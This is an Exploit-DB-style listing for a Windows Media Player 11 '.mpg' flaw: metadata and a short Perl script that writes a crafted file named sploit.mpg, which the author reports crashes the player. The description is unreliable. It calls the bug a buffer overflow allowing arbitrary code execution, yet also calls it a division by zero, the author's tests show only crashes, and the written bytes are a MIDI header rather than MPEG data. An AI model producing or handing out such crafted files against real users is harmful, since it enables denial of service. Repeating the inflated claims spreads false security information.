Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit

vendor:

Windows Media Player

by:

cr4wl3r

9,3

CVSS

HIGH

Buffer Overflow

190

CWE

Product Name: Windows Media Player

Affected Version From: 11.0.5721.5145

Affected Version To: 11.0.5721.5145

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:windows_media_player:11.0.5721.5145

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 ENG

2009

Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit

A buffer overflow vulnerability exists in Windows Media Player 11.0.5721.5145 when processing .mpg files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user. This vulnerability is caused by an integer division by zero error when processing a specially crafted .mpg file.

Mitigation:

Upgrade to the latest version of Windows Media Player 11.0.6 or later.

Source

Exploit-DB raw data:

#!/usr/bin/perl


# Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit
# Homepage: www.microsoft.com
# Exploit Coded by: cr4wl3r <cr4wl3r\x40linuxmail\x2Eorg>
# From: Indonesia
#
####################################################
# Testing Results:
####################################################
# Bug: Integer Division By Zero
# Platform: Windows XP SP3 ENG
# Tested versions:
# 1. Windows Media Player 9         = crash
# 2. Windows Media Player 11.0.5721 = crash
# 3. Windows Media Player 11.0.6    = No crash
####################################################
#
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# WARNING - WARNING - WARNING - WARNING
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
#
#
# Disclaimer: The author published the information under the condition
#             that is not in the intention of the reader to use them in order to bring
#             to himself or others a profit or to bring to others damage.
#
#
# Gr33tz: No Thanks



print "
[+]---------------------------------------------------------------------[+]
[+] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit  [+]
[+] By : cr4wl3r                                                        [+]
[+]---------------------------------------------------------------------[+]
";


$buff = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

open(file, "> sploit.mpg");
print (file $buff);
print "\n\n[+] Done...!!!\n
[+] Open with Windows Media Player\n
[+] Coded by cr4wl3r\n";